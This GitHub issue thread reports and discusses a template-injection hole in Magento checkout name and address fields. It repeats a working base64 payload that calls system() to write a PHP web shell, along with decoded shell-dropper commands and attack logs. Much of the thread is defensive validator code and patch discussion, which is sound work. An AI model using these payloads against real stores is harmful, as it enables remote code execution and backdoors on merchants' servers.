Checkout address forms allow random code in the name fields

[nkarthickannan]

Preconditions and environment

Magento version - 2.4.7-p1

Steps to reproduce

1. Install a fresh Magento latest version with sample data
2. Add to a product to shopping cart and navigate to the checkout page (either as guest or as logged in user)
3. Provide the following code in the First name and Last name fields (shipping and billing address fields)
   {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}} {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}}

Expected result

Magento should not allow to proceed by throwing an error

Actual result

Magento allows the user to proceed further without throwing an error

Additional information

Similar issue is already raised and resolved here - #38331

Release note

No response

Triage and priority

• Severity: S0 - Affects critical data or functionality and leaves users without workaround.
• Severity: S1 - Affects critical data or functionality and forces users to employ a workaround.
• Severity: S2 - Affects non-critical data or functionality and forces users to employ a workaround.
• Severity: S3 - Affects non-critical data or functionality and does not force users to employ a workaround.
• Severity: S4 - Affects aesthetics, professional look and feel, “quality” or “usability”.

[m2-assistant]

Hi @nkarthickannan. Thank you for your report.
To speed up processing of this issue, make sure that the issue is reproducible on the vanilla Magento instance following Steps to reproduce. To deploy vanilla Magento instance on our environment, Add a comment to the issue:

• @magento give me 2.4-develop instance - upcoming 2.4.x release
• For more details, review the Magento Contributor Assistant documentation.
• Add a comment to assign the issue: @magento I am working on this
• To learn more about issue processing workflow, refer to the Code Contributions.

---

Join Magento Community Engineering Slack and ask your questions in #github channel.
⚠️ According to the Magento Contribution requirements, all issues must go through the Community Contributions Triage process. Community Contributions Triage is a public meeting.
🕙 You can find the schedule on the Magento Community Calendar page.
📞 The triage of issues happens in the queue order. If you want to speed up the delivery of your contribution, join the Community Contributions Triage session to discuss the appropriate ticket.

[nkarthickannan]

@magento give me 2.4-develop instance

[magento-deployment-service]

Hi @nkarthickannan. Thank you for your request. I'm working on Magento instance for you.

[magento-deployment-service]

Hi @nkarthickannan, here is your Magento Instance: https://f98c6c8fdb7a86eb78316009476e2e09.instances-prod.magento-community.engineering
Admin access: https://f98c6c8fdb7a86eb78316009476e2e09.instances-prod.magento-community.engineering/admin_d4b5
Login: bb2031d0
Password: 51e17af08a7d

[nkarthickannan]

Issue confirmed in the default Magento provided above. Screenshots are attached here:

[jsdupuis]

I have the same issue with Magento CE 2.4.5-p8. Had 2 injection codes attack using the first name and last name fields. No validation on the checkout page.

[m2-assistant]

Hi @engcom-Bravo. Thank you for working on this issue.
In order to make sure that issue has enough information and ready for development, please read and check the following instruction: 👇

• 1. Verify that issue has all the required information. (Preconditions, Steps to reproduce, Expected result, Actual result).
• 2. Verify that issue has a meaningful description and provides enough information to reproduce the issue.
• 3. Add Area: XXXXX label to the ticket, indicating the functional areas it may be related to.
• 4. Verify that the issue is reproducible on 2.4-develop branch
  Details

  - Add the comment @magento give me 2.4-develop instance to deploy test instance on Magento infrastructure.
  - If the issue is reproducible on 2.4-develop branch, please, add the label Reproduced on 2.4.x.
  - If the issue is not reproducible, add your comment that issue is not reproducible and close the issue and stop verification process here!
• 5. Add label Issue: Confirmed once verification is complete.
• 6. Make sure that automatic system confirms that report has been added to the backlog.

[n2diving-dgx]

Similar code injection in to the customer name field of a bogus guest checkout order received on a production Magento CE 2.4.6-p6 website.

[sunit9]

I am also getting same issue. Some one is trying to add file using base 64 en coding. When i decode i got following

cd pub;echo '<?php if($_POST['p']=="Sd44Ak8H") $_POST['f'](base64_decode($_POST['c']));' > sys.php

Magento version is CE 2.4.5-p1

If anyone havae solution then please provide.

[in-session]

There seems to be a major attempt at code injection at the moment. We were also able to reproduce the same behaviour in several instances. In my evaluation, this only refers to the guest checkout. This was observed in the production system from 3 August.

{{var this.getTemp%00lateFilter().add%00AfterFilterCallback(base64_decode).add%00AfterFilterCallback(system).Filter(Y2QgcHViO2VjaG8gJzw/cGhwIGlmKCRfUE9TVFsncCddPT0iOUdtdFhRbWsiKSAkX1BPU1RbJ2YnXShiYXNlNjRfZGVjb2RlKCRfUE9TVFsnYyddKSk7JyA+IHN5cy5waHA=)}}

cd pub;echo '<?php if($_POST['p']=="9GmtXQmk") $_POST['f'](base64_decode($_POST['c']));' > sys.php

Server error log:

2024/08/03 16:14:23 [error] 163093#163093: *6061362 access forbidden by rule, client: 127.0.0.1, server: _, request: "GET /sys.php HTTP/1.1", host: ***
2024/08/03 16:14:24 [error] 163093#163093: *6062169 access forbidden by rule, client: 127.0.0.1, server: _, request: "GET /pub/sys.php HTTP/1.1", host: ***

It seems here that it was tried using the REST Api and checkout page:

***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:13:57 +0200] "POST /rest//V1/guest-carts HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Linux; Android 11; moto g(10)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:13:58 +0200] "GET /rest//V1/products?searchCriteria[pageSize]=20 HTTP/1.1" 401 6209 "-" "Mozilla/5.0 (Linux; Android 10; Redmi Note 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:13:58 +0200] "GET /catalogsearch/result/?q=%25a%25 HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.116 Mobile DuckDuckGo/5 Safari/537.36"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:00 +0200] "GET /de/search/%25a%25 HTTP/1.1" 200 704544 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.116 Mobile DuckDuckGo/5 Safari/537.36"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:00 +0200] "GET /de/page_cache/block/esi/blocks/%5B%22topmenu_generic%22%5D/handles/WyJkZWZhdWx0IiwiY2F0YWxvZ3NlYXJjaF9yZXN1bHRfaW5kZXgiLCJjYXRhbG9nc2VhcmNoX3Jlc3VsdF9pbmRleF9ub3Jlc3VsdHMiXQ%3D%3D/ HTTP/1.1" 200 7647 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.116 Mobile DuckDuckGo/5 Safari/537.36"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:00 +0200] "GET /de/page_cache/block/esi/blocks/%5B%22container-footer%22%5D/handles/WyJkZWZhdWx0IiwiY2F0YWxvZ3NlYXJjaF9yZXN1bHRfaW5kZXgiLCJjYXRhbG9nc2VhcmNoX3Jlc3VsdF9pbmRleF9ub3Jlc3VsdHMiXQ%3D%3D/ HTTP/1.1" 200 6341 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.116 Mobile DuckDuckGo/5 Safari/537.36"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:09 +0200] "GET /*** HTTP/1.1" 200 100705 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.116 Mobile DuckDuckGo/5 Safari/537.36"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:11 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/items HTTP/1.1" 200 169 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/115.0.5790.160 Mobile/15E148 Safari/604.1"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:11 +0200] "GET /rest//V1/directory/countries HTTP/1.1" 200 4050 "-" "Mozilla/5.0 (iPad; CPU OS 15_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:12 +0200] "GET /rest/default/V1/directory/countries HTTP/1.1" 400 76 "-" "Mozilla/5.0 (iPad; CPU OS 15_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:12 +0200] "GET /rest/en/V1/directory/countries HTTP/1.1" 200 4008 "-" "Mozilla/5.0 (iPad; CPU OS 15_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:12 +0200] "GET /rest/english/V1/directory/countries HTTP/1.1" 400 76 "-" "Mozilla/5.0 (iPad; CPU OS 15_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:13 +0200] "GET /rest/it/V1/directory/countries HTTP/1.1" 400 76 "-" "Mozilla/5.0 (iPad; CPU OS 15_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:13 +0200] "GET /rest/italian/V1/directory/countries HTTP/1.1" 400 76 "-" "Mozilla/5.0 (iPad; CPU OS 15_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:14 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/estimate-shipping-methods HTTP/1.1" 200 12 "-" "Mozilla/5.0 (Linux; Android 12; V2023) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:14 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/estimate-shipping-methods HTTP/1.1" 200 12 "-" "Mozilla/5.0 (Linux; Android 13; SM-G991W) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:15 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/estimate-shipping-methods HTTP/1.1" 200 12 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/115.0.5790.84 Mobile/15E148 Safari/604.1"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:15 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/estimate-shipping-methods HTTP/1.1" 200 12 "-" "Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S911B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/23.0 Chrome/115.0.0.0 Mobile Safari/537.36"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:16 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/estimate-shipping-methods HTTP/1.1" 200 12 "-" "Mozilla/5.0 (Linux; Android 11; 2201117TY) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:16 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/estimate-shipping-methods HTTP/1.1" 200 226 "-" "Mozilla/5.0 (Linux; Android 10; RMX1825) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.99 Mobile Safari/537.36"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:17 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/shipping-information HTTP/1.1" 200 2277 "-" "Mozilla/5.0 (iPad; CPU OS 16_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/282.0.564912098 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:17 +0200] "GET /customer/account/create/ HTTP/1.1" 200 480398 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/104.0.5112.88 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:19 +0200] "GET /checkout HTTP/1.1" 302 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/104.0.5112.88 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:19 +0200] "GET /de/checkout/cart/ HTTP/1.1" 200 471470 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/104.0.5112.88 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:22 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/payment-information HTTP/1.1" 200 14 "-" "Mozilla/5.0 (Linux; Android 5.1.1; KFSUWI) AppleWebKit/537.36 (KHTML, like Gecko) Silk/108.9.6 like Chrome/108.0.5359.220 Safari/537.36"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:23 +0200] "GET /sys.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (iPad; CPU OS 15_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/250.0.505561494 Mobile/15E148 Safari/604.1"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:24 +0200] "GET /pub/sys.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (iPhone; CPU OS 17_0_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) 1Password/7.10.2 (like Version/17.0.3 Mobile/21A360 Safari/600.1.4)"

The system should fix the problem with CVE-2022-24086, but the orders are still coming in and a validation should be carried out beforehand. There already seems to be a merged pull here, but it is not yet included in the core:
#38345

[engcom-Bravo]

@magento give me 2.4-develop instance

[magento-deployment-service]

Hi @engcom-Bravo. Thank you for your request. I'm working on Magento instance for you.

[magento-deployment-service]

Hi @engcom-Bravo, here is your Magento Instance: https://f98c6c8fdb7a86eb78316009476e2e09.instances-prod.magento-community.engineering
Admin access: https://f98c6c8fdb7a86eb78316009476e2e09.instances-prod.magento-community.engineering/admin_2e92
Login: b7d8f52a
Password: 8352e1128731

[engcom-Bravo]

Hi @nkarthickannan,

Thanks for your reporting and collaboration.

We have verified the issue in Latest 2.4-develop instance and the issue is reproducible.Kindly refer the screenshots.

Steps to reproduce

• Install a fresh Magento latest version with sample data
• Add to a product to shopping cart and navigate to the checkout page (either as guest or as logged in user)
• Provide the following code in the First name and Last name fields (shipping and billing address fields)
• {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}} {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}}

It allows the first and last name with the random code without throwing any error.

Hence Confirming the issue.

Thanks.

[github-jira-sync-bot]

✅ Jira issue https://jira.corp.adobe.com/browse/AC-12687 is successfully created for this GitHub issue.

[m2-assistant]

✅ Confirmed by @engcom-Bravo. Thank you for verifying the issue.
Issue Available: @engcom-Bravo, You will be automatically unassigned. Contributors/Maintainers can claim this issue to continue. To reclaim and continue work, reassign the ticket to yourself.

[Max-Leps]

@bafmaamy

@Max-Leps you can update the code of app/code/{Vendor}/{Your Module}/Plugin/OrderSourceLogger.php; with:

<?php
namespace {Vendor}/{Your Module}\Plugin;

use Magento\Sales\Api\OrderRepositoryInterface;
use Psr\Log\LoggerInterface;
use Magento\Framework\Exception\InputException;

class OrderSourceLogger
{
    protected $logger;

    public function __construct(LoggerInterface $logger)
    {
        $this->logger = $logger;
    }

    private function getClientIp()
    {
        if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
            return $_SERVER['HTTP_CLIENT_IP'];
        } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            return $_SERVER['HTTP_X_FORWARDED_FOR'];
        } elseif (!empty($_SERVER['HTTP_X_REAL_IP'])) {
            return $_SERVER['HTTP_X_REAL_IP'];
        } else {
            return $_SERVER['REMOTE_ADDR'];
        }
    }

    private function validateInput($input, $fieldName, $maxLength = null)  {
        // Check if input is null or empty, skip validation if it is
	 if (empty($input)) {
		return;
	    }
       
        // Check for disallowed characters
        if (preg_match('/[{}<>%]/', $input)) {
            throw new InputException(__("Invalid characters in $fieldName."));
        }

        // Length validation if maxLength is provided
        if ($maxLength !== null && strlen($input) > $maxLength) {
            throw new InputException(__("$fieldName cannot exceed $maxLength characters."));
        }
    }

    public function beforeSave(OrderRepositoryInterface $subject, $order)
    {
        $isApiOrder = false;

        // Check if the order is placed via API by inspecting the current request
        if (php_sapi_name() !== 'cli' && isset($_SERVER['HTTP_USER_AGENT'])) {
            $userAgent = $_SERVER['HTTP_USER_AGENT'];
            if (strpos($userAgent, 'REST') !== false || strpos($userAgent, 'API') !== false) {
                $isApiOrder = true;
            }
        }

        try {
            // Validate firstname and lastname with length limit
            $this->validateInput($order->getCustomerFirstname(), 'First Name', 30);
            $this->validateInput($order->getCustomerLastname(), 'Last Name', 30);

            // Validate company and other address fields for disallowed characters
            $billingAddress = $order->getBillingAddress();
            $shippingAddress = $order->getShippingAddress();

            if ($billingAddress) {
                $this->validateInput($billingAddress->getCompany(), 'Billing Company');
                $this->validateInput($billingAddress->getCity(), 'Billing City');
                $this->validateInput($billingAddress->getPostcode(), 'Billing Postcode');
                $this->validateInput($billingAddress->getStreetLine(1), 'Billing Street Address');
            }

            if ($shippingAddress) {
                $this->validateInput($shippingAddress->getCompany(), 'Shipping Company');
                $this->validateInput($shippingAddress->getCity(), 'Shipping City');
                $this->validateInput($shippingAddress->getPostcode(), 'Shipping Postcode');
                $this->validateInput($shippingAddress->getStreetLine(1), 'Shipping Street Address');
            }
            
            // Assuming there is a field for order comments
            if ($order->getCustomerNote()) {
                $this->validateInput($order->getCustomerNote(), 'Order Comments');
            }

            // Log the source of the order and additional request details
            $orderSource = $isApiOrder ? 'API' : 'Web';
            $this->logger->info('Order placed via ' . $orderSource . ': Order ID ' . $order->getEntityId());

            $this->logger->info('Order Details', [
                'IP' => $this->getClientIp(),
                'User Agent' => $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown User Agent',
                'Request URI' => $_SERVER['REQUEST_URI'] ?? 'Unknown URI',
            ]);
        } catch (InputException $e) {
            // Log the unsuccessful attempt
            $this->logger->warning('Unsuccessful order attempt: ' . $e->getMessage(), [
                'IP' => $this->getClientIp(),
                'User Agent' => $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown User Agent',
                'Request URI' => $_SERVER['REQUEST_URI'] ?? 'Unknown URI',
            ]);

            // Rethrow the exception to stop the order from being saved
            throw $e;
        }
    }
}

Added validation of - shpping address, billing address, post code, city, order comments and disallow more than 30 characters in firstname and lastname too.

Hello

Thank you so much for your effort, I really appreciate it!
You seem to be very talented in Magento and coding. I'm impressed.

But you have missed some fields.
I think if we left some unrestricted fields they still can inject the code.

Actually can you filter all these fields:

first name
last name
email
company
street address line 1
street address line 2
country
state
city
postcode
phone number
order comments (if it's there)

And can you do it for all possible inputs like:

Shipping address
Billing address
Customer registration

After that we all be 99.99% protected
Right?

Cheers
Max

[bafmaamy]

@ssx @RotzGott @Max-Leps Yea, It's a great idea everything to be validated.

Just finished the module. Now every field is protected.

https://github.com/bafmaamy/Magento-FieldValidator

Tested on 2.4.6

@in-session I really want to help about this, but not enough skills to touch the core of magento. Now the module validating fields of Order Creation, Customer Creation, Customer Name Update, Customer Address Update and save every unsuccessful attempt. Hope this can help.

[ganeddact]

if the problem with firstname and lastname gets solved sooner or later, how is it possible to place an order bypassing the payment altogether like attackers are doing? I don't think it's related with the firstname and lastname content. Orders look legit apart from those values, and some people may fall to fulfil them without checking if a payment has gone through

[ssx]

if the problem with firstname and lastname gets solved sooner or later, how is it possible to place an order bypassing the payment altogether like attackers are doing? I don't think it's related with the firstname and lastname content. Orders look legit apart from those values, and some people may fall to fulfil them without checking if a payment has gone through

Some payments are completed in two steps, usually when a payment gateway is set to redirect mode. In these situations, the order is placed into Pending Payment, they go off to complete payment and the order is updated once they return.

[jonaschen623]

Just an update, today when I try to place an order with name/address fields
{{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}} {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}}

Magento (Commerce Cloud 2.4.6-p6) returns 400 bad request error with message "malformed request".

Aug security patch hasn't applied yet.

This error shows for both the frontend and API and stops placing an order.

Last week, I could still replicate this issue in the STG environment.

Probably Adobe Cloud Team applied Fastly rules just now.

Update
Adobe team has confirmed, they've done nothing as this is not considered a bug.
They recommend blocking suspicious IPs using Fastly.

[ssx]

Just an update, today when I try to place an order with name/address fields {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}} {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}}

Magento (Commerce Cloud 2.4.6-p6) returns 400 bad request error with message "malformed request".

Aug security patch hasn't applied yet.

This error shows for both the frontend and API and stops placing an order.

Last week, I could still replicate this issue in the STG environment.

Probably Adobe Cloud Team applied Fastly rules just now.

Yeah I'd imagine so, for our Commerce Cloud clients that's exactly how I did it too!

[Max-Leps]

@bafmaamy

@ssx @RotzGott @Max-Leps Yea, It's a great idea everything to be validated.

Just finished the module. Now every field is protected.

https://github.com/bafmaamy/Magento-FieldValidator

Tested on 2.4.6

@in-session I really want to help about this, but not enough skills to touch the core of magento. Now the module validating fields of Order Creation, Customer Creation, Customer Name Update, Customer Address Update and save every unsuccessful attempt. Hope this can help.

Hello
Thank you for your effort.

I tested the module and I am still able to inject code during registration

Also I am not getting email when it catches the injection attempt.

[bafmaamy]

@Max-Leps yes, forgot about state/region validation. Added in AddressSavePlugin.php :

// Validate State/Region
$region = $address->getRegion();
if ($region) {
    $this->validateInput($region->getRegion(), 'State/Region Name');
    $this->validateInput($region->getRegionCode(), 'State/Region Code');
    $this->validateInput($region->getRegionId(), 'State/Region ID');
}

and similar if statement in OrderSourceLogger.php

Check the updated files:
app/code/Bafmaamy/FieldValidator/Plugin/OrderSourceLogger.php
app/code/Bafmaamy/FieldValidator/Plugin/AddressSavePlugin.php

About the email notifications, please ensure that mailx is installed and configured correctly on your server. Try:
echo "Hello" | mailx -s 'Test' [email protected]
Then try with: mail, sendmail, or whatever mail service you are using.

[WaPoNe]

Based on https://github.com/bafmaamy/Magento-FieldValidator (great job @bafmaamy!) I've release a similar extension with these different features:

• Configuration to enable/disable module;
• Configuration to set the regular expression to reject input values;
• Configuration to set the limit of characters to use only for the firstname and lastname fields validation;
• Configuration to enable/disable invalidation fields results notification;
• Configuration to set email addresses to receive invalidation fields results;
• Use of Magento mail service;
• Added other customer fields;
• Use of an abstract class for all the Plugins.

The extension is available here: https://github.com/WaPoNe/module-input-fields-validator and it can be installed by composer:

composer require wapone/module-input-fields-validator

[Max-Leps]

@WaPoNe

Based on https://github.com/bafmaamy/Magento-FieldValidator (great job @bafmaamy!) I've release a similar extension with these different features:

• Configuration to enable/disable module;
• Configuration to set the regular expression to reject input values;
• Configuration to set the limit of characters to use only for the firstname and lastname fields validation;
• Configuration to enable/disable invalidation fields results notification;
• Configuration to set email addresses to receive invalidation fields results;
• Use of Magento mail service;
• Added other customer fields;
• Use of an abstract class for all the Plugins.

The extension is available here: https://github.com/WaPoNe/module-input-fields-validator and it can be installed by composer:

composer require wapone/module-input-fields-validator

That's good but is in conflict with ebizmarts payment plugin
https://store.ebizmarts.com/opayo-sagepay-suite-pro-for-magento-2.html

When we enable that module, it stops working with its all extensions even when all the fields are filled in correctly

Cheers

[Max-Leps]

@bafmaamy

@Max-Leps yes, forgot about state/region validation. Added in AddressSavePlugin.php :

// Validate State/Region
$region = $address->getRegion();
if ($region) {
    $this->validateInput($region->getRegion(), 'State/Region Name');
    $this->validateInput($region->getRegionCode(), 'State/Region Code');
    $this->validateInput($region->getRegionId(), 'State/Region ID');
}

and similar if statement in OrderSourceLogger.php

Check the updated files: app/code/Bafmaamy/FieldValidator/Plugin/OrderSourceLogger.php app/code/Bafmaamy/FieldValidator/Plugin/AddressSavePlugin.php

About the email notifications, please ensure that mailx is installed and configured correctly on your server. Try: echo "Hello" | mailx -s 'Test' [email protected] Then try with: mail, sendmail, or whatever mail service you are using.

Hi

IDK what you have changed recently but after all this changes it stopped working with payment module
I mean this module: https://store.ebizmarts.com/opayo-sagepay-suite-pro-for-magento-2.html

o its in conflict with that module.

Cheers

[bafmaamy]

@Max-Leps There is a possibility your payment module to use same kind of validation for the region field or you have enabled both modules together - the WaPoNe's and this one. Check the logs, the error is there.

Otherwise try the old version without the region validation:

In app/code/Bafmaamy/FieldValidator/Plugin/OrderSourceLogger.php comment lines from 60 to 65 and from 73 to 78.

then remove or comment from AddressSavePlugin.php

// Validate State/Region
$region = $address->getRegion();
if ($region) {
    $this->validateInput($region->getRegion(), 'State/Region Name');
    $this->validateInput($region->getRegionCode(), 'State/Region Code');
    $this->validateInput($region->getRegionId(), 'State/Region ID');
}

"

php bin/magento setup:di:compile

[frostitution]

@ssx @jonaschen623 We are on cloud, where would we find these changes and if they are applied?

[jonaschen623]

@ssx @jonaschen623 We are on cloud, where would we find these changes and if they are applied?

Adobe confirmed they haven't applied any change.

The only recommendation is blocking suspicious IPs using Fastly.

So I have no clue now. 😆

[crazytrace]

I am still waiting for the final solution for this issue, currently just blocking their route of the IPv4 IPv6 address via iptables, it seems everything is in order these two weeks by far.

[in-session]

OK, I've made a little bit more on it, that should cover the most important things, but it's still in the test phase: #39030

Maybe someone would like to try it out.

[bafmaamy]

gj, but still "{" allowed in the Region field and Company field.

[Max-Leps]

@in-session

OK, I've made a little bit more on it, that should cover the most important things, but it's still in the test phase: #39030

Maybe someone would like to try it out.

Is it magento core changes?
But we already have 2 plugins for filtering all these fields.

[jsdupuis]

@Max-Leps I am personally waiting for an official Magento core change, not a custom plugin. Input validation against code injection should be part of the Magento platform. We shouldn't have to install or buy an extension for this.

[in-session]

@Max-Leps
Yes, I am trying to bring the function into the core, as mentioned by jsdupuis, security-relevant functions should be integrated into the core. In my opinion, a plugin only makes sense here for a temporary solution. As I said, the current solution still has to go through all the tests and I think it also makes sense to add the validation of all postrequests. This has also already been added to the merge: https://github.com/magento/magento2/pull/38345/files In my opinion, this is the right way to go. But I think the patterns are still not correct and I have adapted them and made them globally available so that the fields can also be validated in other functions.

[Max-Leps]

@in-session

Hello
Did they confirm this fix?

[in-session]

@Max-Leps
No the pull is in the test phase as well as another pull #39131. Whether a merge will ever come is always written in the stars, hence open source. And unfortunately I can't say whether magento does anything here either. @engcom-Bravo https://jira.corp.adobe.com/browse/AC-12687. Is there anything new?

[Max-Leps]

Hello

Any core fix for the issue so far?